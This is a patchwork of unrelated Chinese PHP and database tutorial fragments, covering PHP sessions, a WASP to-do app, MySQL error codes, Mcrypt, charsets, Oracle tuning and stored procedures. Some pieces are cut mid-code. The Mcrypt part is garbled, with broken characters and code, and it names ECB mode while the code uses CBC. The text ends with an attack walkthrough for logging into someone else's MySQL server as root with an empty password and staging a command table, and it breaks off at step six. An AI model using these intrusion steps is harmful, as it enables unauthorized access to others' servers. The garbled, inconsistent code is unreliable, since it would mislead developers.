PHP入门

使用数据库保存session的方法
php的session默认是以文件方式保存在服务器端，并且在客户端使用cookie保存变量，这就会出现一个问题，当一个用户由于某种安全原因关闭了浏览器的cookie，程序中的session相关操作将无法执行。因此，如果能以数据库保存session数据，将不受客户端设置的限制，并且在性能和扩展性等方面有一个飞跃。程序中使用关键函数是session_set_save_handler，同时要将php.ini里的session.save_handler = files 改为 user。这里我们讨论的环境是linux(freesd)+apache+mysql+php。
数据表结构：[sessions]
CREATE TABLE sessions ( 
sesskey char(32) not null, 
expiry int(11) unsigned not null, 
value text not null, 
PRIMARY KEY (sesskey) 
);
程序代码：[session_inc.php]
<?php 
$SESS_DBHOST = "yourhost"; /* database server hostname */ 
$SESS_DBNAME = "yourdb"; /* database name */ 
$SESS_DBUSER = "youruser"; /* database user */ 
$SESS_DBPASS = "yourpassword"; /* database password */ 
 
$SESS_DBH = ""; 
$SESS_LIFE = get_cfg_var("session.gc_maxlifetime"); 
 
function sess_open($save_path, $session_name) { 
      global $SESS_DBHOST, $SESS_DBNAME, $SESS_DBUSER, $SESS_DBPASS, $SESS_DBH; 
 
      if (! $SESS_DBH = mysql_pconnect($SESS_DBHOST, $SESS_DBUSER, $SESS_DBPASS)) { 
     echo "<li>Can't connect to $SESS_DBHOST as $SESS_DBUSER"; 
     echo "<li>MySQL Error: " . mysql_error(); 
     die; 
      } 
 
      if (! mysql_select_db($SESS_DBNAME, $SESS_DBH)) { 
     echo "<li>Unable to select database $SESS_DBNAME"; 
     die; 

下面来为标记 arTasks来填充内容，我们需要在数据库中已经存在相关的记录。另外得连接上数据库，通过用WASP的数据模型，了就是用Wrapper类。
代码：
$oTasks = new TaskWrapper();
$oTasks->findAll();
创建了一个专对于表 Task 的数据操作对象,并且查询出所有存在的记录。
现在可以用下面的代码来循环输出值：
while($oTasks->next())
next()方法将会在没有记录时返回false
在循环的过程中，用一个数组来保存值，以便下一步的显示输出:
$arTasks[$oTasks->getId()] = $oTasks->toArray();
这段代码使用了一个内置函数getID来得到数据表中的主键。回想一下我们创建数据表时，我们在字段TaskId上创建一个主键，这样getI在就会得到字段TaskId的值。利用这个主键，可以把从数据库中取得的当前数组赋值可以传对象Wrapper。内置函数toArray()会以数组的行式返回当前数据库中的数据。例如：这个数组会像下面的一样：
{ 'TaskId' = '1' , 'Name'=>'Buy Groceries'}
视图代码并不关心 TaskId 字段，但是应该注意: 标记{task[Name]} 在页面上显示的是数据表中字段名为Name的值。
在这里没有form表单，也不就需要使用 handleEvents()方法。
到现在已经完成了对显示页面中的任务列表输出的代码编写。如果在数据库中没有存在相应的数据，那么在页面上面将不会有任务输出，因为arTasks是空的，所以模版中的代码段:
<li flexy:foreach="arTasks,key,task">{task[Name]} - <i>{task[Due]}</i></li>
将不会有输出。
一旦通过页面 Todo/Entry/ 输入第一条数据， flexy:foreach 也就有了循环的值，列表项目将会显示。
图：
如果输入更多的数据，那么将会有更多的顶目显示：
图：
结束语
到这里就完成了一个任务列表的小程序，我们可以添加和查看任务。当做这只是一个很简单的便子，如果要做更强大的功能，要更多的功能，设计更好多的页面，将会有更多的工作要做。但是幸运的，HTML代码全部是在视图层里面，我们可以任意的修改模版，而不用担心PHP代码。
总结
像模版和DB_DataObjects数据库对象目前都已经在PHP上面使用，但是没有一个应用于产品的统一标准。随着PHP中面向对象功能的加强，使用WASP进行PHP开发是很方便的。希望我们可以使用WASP来开发出更多的，更好的，动态网站。有关WASP的详细信息，请查阅： WASP documenttation.

常见错误！
1016错误：文件无法打开，使用后台修复或者使用phpmyadmin进行修复。
1044错误：数据库用户权限不足，请联系空间商解决
1045错误：数据库服务器/数据库用户名/数据库名/数据库密码错误，请联系空间商检查帐户。
1054错误：程序文件跟数据库有冲突，请使用正确的程序文件上传上去覆盖。
1146错误：数据表缺失,请恢复备份数据.
2002错误：服务器端口不对，请咨询空间商正确的端口。
2003错误：mysql服务没有启动，请启动该服务
1005：创建表失败
1006：创建数据库失败
1007：数据库已存在，创建数据库失败
1008：数据库不存在，删除数据库失败
1009：不能删除数据库文件导致删除数据库失败
1010：不能删除数据目录导致删除数据库失败
1011：删除数据库文件失败
1012：不能读取系统表中的记录
1020：记录已被其他用户修改
1021：硬盘剩余空间不足，请加大硬盘可用空间
1022：关键字重复，更改记录失败
1023：关闭时发生错误
1024：读文件错误
1025：更改名字时发生错误
1026：写文件错误
1032：记录不存在
1036：数据表是只读的，不能对它进行修改
1037：系统内存不足，请重启数据库或重启服务器
1038：用于排序的内存不足，请增大排序缓冲区
1040：已到达数据库的最大连接数，请加大数据库可用连接数
1041：系统内存不足
1042：无效的主机名
1043：无效连接
1044：当前用户没有访问数据库的权限
1045：不能连接数据库，用户名或密码错误
1048：字段不能为空
1049：数据库不存在
1050：数据表已存在
1051：数据表不存在
1054：字段不存在
1065：无效的SQL语句，SQL语句为空
1081：不能建立Socket连接
1114：数据表已满，不能容纳任何记录
1116：打开的数据表太多
1129：数据库出现异常，请重启数据库
1130：连接数据库失败，没有连接数据库的权限
1133：数据库用户不存在
1141：当前用户无权访问数据库
1142：当前用户无权访问数据表
1143：当前用户无权访问数据表中的字段
1146：数据表不存在
1147：未定义用户对数据表的访问权限
1149：SQL语句语法错误
1158：网络错误，出现读错误，请检查网络连接状况
1159：网络错误，读超时，请检查网络连接状况
1160：网络错误，出现写错误，请检查网络连接状况
		

综述：Mcrypt 2.4.7是一个功能强大的加密算法扩展库，它包括有22种算法，其中就包括下面的几种算法： ????Blowfish RC2 Safer-sk64 xtea ????Cast-256 RC4 Safer-sk128 ????DES RC4-iv Serpent ????Enigma Rijndael-128 Threeway ????Gost Rijndael-192 TripleDES ????LOKI97 Rijndael-256 Twofish ????PanamaSaferplus Wake ??如何安装Mcrypt？ ??在标准的PHP软件包中不包括Mcrypt，因此需要下载它，下载的地址为：ftp://argeas.cs-net.gr/pub/unix/mcrypt/ 。下载后，按照下面的方法进行编译，并把它扩充在PHP中： ??下载Mcrypt软件包。
　????gunzipmcrypt-x.x.x.tar.gz ????tar -xvfmcrypt-x.x.x.tar ????./configure --disable-posix-threads ????make ????make install ????cd to your PHP directory. ????./configure -with-mcrypt=[dir] [--other-configuration-directives] ????make ????make install ??根据你的要求和PHP安装时与服务器作适当的修改。
　??如何使用Mcrypt扩展库对数据进行加密？ ??首先，我们将介绍如何使用Mcrypt扩展库对数据进行加密，然后再介绍如何使用它进行解密。下面的代码对这一过程进行了演示，首先是对数据进行加密，然后在浏览器上显示加密后的数据，并将加密后的数据还原为原来的字符串，将它显示在浏览器上。
　??使用Mcrypt对数据进行加、解密 ????"; ????$decrypted_string = mcrypt_decrypt($cipher_alg, $key, ????$encrypted_string, MCRYPT_MODE_CBC, $iv); ????print "Decrypted string: $decrypted_string"; ?????> ??执行上面的脚本将会产生下面的输出： ????Original string: Applied Cryptography, by Bruce Schneier, is a wonderful cryptography reference. ????Encrypted string: 02a7c58b1ebd22a9523468694b091e60411cc4dea8652bb8072 34fa06bbfb20e71ecf525f29df58e28f3d9bf541f7ebcecf62b c89fde4d8e7ba1e6cc9ea24850478c11742f5cfa1d23fe22fe8 bfbab5e ????Decrypted string: Applied Cryptography, by Bruce Schneier, is a wonderful cryptography reference. ??上面的代码中两个最典型的函数是mcrypt_encrypt()和 mcrypt_decrypt()，它们的用途是显而易见的。我们使用了"电报密码本"模式，Mcrypt提供了几种加密方式，由于每种加密方式都有可以影响密码安全的特定字符，因此对每种模式都需要了解。对那些没有接触过密码系统的读者来说，赡芏?crypt_create_iv()函数更有兴趣，我们会提到它创建的初始化向量（hence, iv），这一向量可以使每条信息彼此独立。
　尽管不是所有的模式都需要这一初始化变量，但如果在要求的模式中没有提供这一变量，PHP就会给出警告信息。

还是先 Create table 吧
create table emp(
id int not null primary key,
name varchar(10)
);
create table emp_dept(
dept_id varchar(4) not null,
emp_id int not null,
emp_name varchar(10),
primary key (dept_id,emp_id));
insert into emp() values
(1,"Dennis-1"),
(2,"Dennis-2"),
(3,"Dennis-3"),
(4,"Dennis-4"),
(5,"Dennis-5"),
(6,"Dennis-6"),
(7,"Dennis-7"),
(8,"Dennis-8"),
(9,"Dennis-9"),
(10,"Dennis-10");
insert into emp_dept() values
("R&D",1,"Dennis-1"),
("DEv",2,"Dennis-2"),
("R&D",3,"Dennis-3"),
("Test",4,"Dennis-4"),
("Test",5,"Dennis-5");

在上篇我们讲了登录、增加用户、密码更改等问题。下篇我们来看看MYSQL中有关数据库方面的操作。注意：你必须首先登录到MYSQL中，以下操作都是在MYSQL的提示符下进行的，而且每个命令以分号结束。
一、操作技巧
1、如果你打命令时，回车后发现忘记加分号，你无须重打一遍命令，只要打个分号回车就可以了。也就是说你可以把一个完整的命令分成几行来打，完后用分号作结束标志就OK。
2、你可以使用光标上下键调出以前的命令。但以前我用过的一个MYSQL旧版本不支持。我现在用的是mysql-3.23.27-beta-win。
二、显示命令
1、显示数据库列表。
show databases;
刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
2、显示库中的数据表：
use mysql； ／／打开库，学过FOXBASE的一定不会陌生吧
show tables;
3、显示数据表的结构：
describe 表名;
4、建库：
create database 库名;
5、建表：
use 库名；
create table 表名 (字段设定列表)；
6、删库和删表:
drop database 库名;
drop table 表名；
7、将表中记录清空：
delete from 表名;
8、显示表中的记录：
select * from 表名;
三、一个建库和建表以及插入数据的实例
drop database if exists school; //如果存在SCHOOL则删除
create database school; //建立库SCHOOL
use school; //打开库SCHOOL
create table teacher //建立表TEACHER
(
id int(3) auto_increment not null primary key,
name char(10) not null,
address varchar(50) default '深圳',
year date
); //建表结束
//以下为插入字段
insert into teacher values('','glchengang','深圳一中','1976-10-10');
insert into teacher values('','jack','深圳一中','1975-12-23');
注：在建表中
（1）将ID设为长度为3的数字字段:int(3)并让它每个记录自动加一:auto_increment并不能为空:not null而且让他成为主字段primary key
（2）将NAME设为长度为10的字符字段
（3）将ADDRESS设为长度50的字符字段，而且缺省值为深圳。varchar和char有什么区别呢，只有等以后的文章再说了。

Q:我可不可以在输出内容后再输出头信息呢?
 
A:当然可以,PHP配置文件(PHP3为php3.ini,PHP4为php.ini)中有一个配置项可以来设置,该配置项的名字为output_buffering,您将其设置为On,并重新启动Apache,IIS或PWS等Web服务即可.

 从MySQL 4.1开始引入的多语言支持确实很棒，而且一些特性已经超过了其他的数据库系统。不过在测试过程中发现使用适用于MySQL 4.1之前的PHP语句操作MySQL数据库会造成乱码，即使是设置过了表字符集也是如此。
MySQL 4.1的字符集支持(Character Set Support)有两个方面：字符集(Character set)和排序方式(Collation)。对于字符集的支持细化到四个层次: 服务器(server)，数据库(database)，数据表(table)和连接(connection)。
查看系统的字符集和排序方式的设定可以通过下面的两条命令：
mysql> SHOW VARIABLES LIKE 'character_set_%';
+--------------------------+----------------------------+
| Variable_name | Value |
+--------------------------+----------------------------+
| character_set_client | latin1 |
| character_set_connection | latin1 |
| character_set_database | latin1 |
| character_set_results | latin1 |
| character_set_server | latin1 |
| character_set_system | utf8 |
| character_sets_dir | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
7 rows in set (0.00 sec)
mysql> SHOW VARIABLES LIKE 'collation_%';
+----------------------+-------------------+
| Variable_name | Value |
+----------------------+-------------------+
| collation_connection | latin1_swedish_ci |
| collation_database | latin1_swedish_ci |
| collation_server | latin1_swedish_ci |
+----------------------+-------------------+
3 rows in set (0.00 sec)
上面列出的值就是系统的默认值。(很奇怪系统怎么默认是latin1的瑞典语排序方式)...
当我们按照原来的方式通过PHP存取MySQL数据库时，就算设置了表的默认字符集为utf8并且通过UTF-8编码发送查询，你会发现存入数据库的仍然是乱码。问题就出在这个connection连接层上。解决方法是在发送查询前执行一下下面这句：
SET NAMES 'utf8';
它相当于下面的三句指令：
SET character_set_client = utf8;
SET character_set_results = utf8;
SET character_set_connection = utf8;
END 

SQL功能与特性
　　其实，在前面的文章中，已经提及SQL命令的一些基本功能，然而，通过SQL命令，程序设计师或数据库管理员（DBA）可以：
　　（一）建立数据库的表格。（包括设置表格所可以使用之空间）
　　（二）改变数据库系统环境设置。
　　（三）针对某个数据库或表格，授予用户存取权限。
　　（四）对数据库表格建立索引值。
　　（五）修改数据库表格结构。（新建、删除或是修改表格字段）
　　（六）对数据库进行数据的新建。
　　（七）对数据库进行数据的删除。
　　（八）对数据库进行数据的修改。
　　（九）对数据库进行数据的查询。
　　这几项便是通过SQL命令可以完成的事情，看起来是不是比起“查询”两个字所代表的功能要多的多了呢？
　　SQL语法的分类
　　其实SQL命令并不是非常多，可是要把SQL用到出神入化，却也只需要短短几个命令便够，因为SQL命令是针对关系型数据库所建立出来的语法叙述，所以SQL在这类数据库中所发挥的功能非常的强，以下将针对在VB中常用的SQL语法基本命令加以分类介绍。在说明SQL的命令以及使用语法之前，以下将SQL做了的分类，在致上SQL语法所使用到的类型，可以说都已包含在这些类别当中。
　　第一类、属性词（Predicates）
　　在SQL命令中用来指明所要选择的记录的方式。如ALL、TOP与DISTINCT等等。
　　第二类、声明（Declaration）
　　针对SQL Parameter或Parameter Query 的名称与数据类型做声明，如PARAMETERS的声明等等。
　　第三类、条件子句（Clause）
　　在SQL的查询中，利用一些表达式定义出查询的条件，以缩小寻找的范围，如WHERE。
　　第四类、运算符（Operator）与操作数（Operation）
　　在SQL的查询中，与Operation共同组成表达式（Expression），如BETWEEN....AND 运算符与INNER JOIN操作数。
　　第五类、函数（Function）
　　一些SQL常见的函数，像是AVG()是求算数平均数的函数。
　　第六类、SQL语句（Statement）
　　SQL的语句，可以说是SQL语法的主体，用来对某一个特定的数据库发出指示，并返回相关的数据，而SQL的语法结构，基本上可以利用下面
　　的式子来表示：命令＋条件子句
　　例如：
　　SELECT*FROM TAB WHERE TAB.NAME='A'
　　其中的“FROM....WHERE”便是一个条件子句，其实SQL的语法并不难，您只需记住这样的一个规则，相信可以很快的了解SQL用法。

1. 选用适合的ORACLE优化器
ORACLE的优化器共有3种:
a. RULE (基于规则) b. COST (基于成本) c. CHOOSE (选择性)
设置缺省的优化器,可以通过对init.ora文件中OPTIMIZER_MODE参数的各种声明,如RULE,COST,CHOOSE,ALL_ROWS,FIRST_ROWS . 你当然也在SQL句级或是会话(session)级对其进行覆盖.
为了使用基于成本的优化器(CBO, Cost-Based Optimizer) , 你必须经常运行analyze 命令,以增加数据库中的对象统计信息(object statistics)的准确性.
如果数据库的优化器模式设置为选择性(CHOOSE),那么实际的优化器模式将和是否运行过analyze命令有关. 如果table已经被analyze过, 优化器模式将自动成为CBO , 反之,数据库将采用RULE形式的优化器.
在缺省情况下,ORACLE采用CHOOSE优化器, 为了避免那些不必要的全表扫描(full table scan) , 你必须尽量避免使用CHOOSE优化器,而直接采用基于规则或者基于成本的优化器.
2. 访问Table的方式
ORACLE 采用两种访问表中记录的方式:
a. 全表扫描
全表扫描就是顺序地访问表中每条记录. ORACLE采用一次读入多个数据块(database block)的方式优化全表扫描.
b. 通过ROWID访问表
你可以采用基于ROWID的访问方式情况,提高访问表的效率, , ROWID包含了表中记录的物理位置信息..ORACLE采用索引(INDEX)实现了数据和存放数据的物理位置(ROWID)之间的联系. 通常索引提供了快速访问ROWID的方法,因此那些基于索引列的查询就可以得到性能上的提高.

存储过程入门与提高
什么是存储过程呢？
定义：
将常用的或很复杂的工作，预先用SQL语句写好并用一个指定的名称存储起来, 那么以后要叫数据库提供与已定义好的存储过程的功能相同的服务时,只需调用execute,即可自动完成命令。
讲到这里,可能有人要问：这么说存储过程就是一堆SQL语句而已啊？
Microsoft公司为什么还要添加这个技术呢?
那么存储过程与一般的SQL语句有什么区别呢?
存储过程的优点：
1.存储过程只在创造时进行编译，以后每次执行存储过程都不需再重新编译，而一般SQL语句每执行一次就编译一次,所以使用存储过程可提高数据库执行速度。
2.当对数据库进行复杂操作时(如对多个表进行Update,Insert,Query,Delete时），可将此复杂操作用存储过程封装起来与数据库提供的事务处理结合一起使用。
3.存储过程可以重复使用,可减少数据库开发人员的工作量
4.安全性高,可设定只有某此用户才具有对指定存储过程的使用权
存储过程的种类：
1.系统存储过程：以sp_开头,用来进行系统的各项设定.取得信息.相关管理工作,
如 sp_help就是取得指定对象的相关信息
2.扩展存储过程 以XP_开头,用来调用操作系统提供的功能
exec master..xp_cmdshell 'ping 10.8.16.1'
3.用户自定义的存储过程,这是我们所指的存储过程
常用格式
Create procedure procedue_name
[@parameter data_type][output]
[with]{recompile|encryption}
as
sql_statement
解释:
output：表示此参数是可传回的
with {recompile|encryption}
recompile:表示每次执行此存储过程时都重新编译一次
encryption:所创建的存储过程的内容会被加密
如:
表book的内容如下
编号 书名 价格
001 C语言入门 $30
002 PowerBuilder报表开发 $52
实例1:查询表Book的内容的存储过程
create proc query_book
as
select * from book
go
exec query_book

MYSQL用户ROOT密码为空时是一个很大的漏洞，在网上也有许多一些利用此漏洞的方法，一般就是写一个ASP或PHP的后门，不仅很麻烦，而且还要猜解网站的目录，如果对方没有开IIS，那我们岂不没办法了？？

后来，自己思索想到一个办法，且在测试的几台有此漏洞的机中均获得了成功，现将攻击方法公布如下：

1、连接到对方MYSQL 服务器

mysql -u root -h 192.168.0.1

mysql.exe 这个程序在你安装了MYSQL的的BIN目录中

2、让我们来看看服务器中有些什么数据库

mysql>show databases;

MYSQL默认安装时会有MYSQL、TEST这两个数据库，如果你看到有其它的数据库那么就是用户自建的数据库。

3、让我们进入数据库

mysql>use test;

我们将会进入test数据库中

4、查看我们进入数据库中有些什么数据表

mysql>show tables;

默认的情况下，test中没有任何表的存在。

以下为关键的部分

5、在TEST数据库下创建一个新的表；

mysql>create table a (cmd text);

好了，我们创建了一个新的表，表名为a，表中只存放一个字段，字段名为cmd，为text文本。

6、在表中插入内容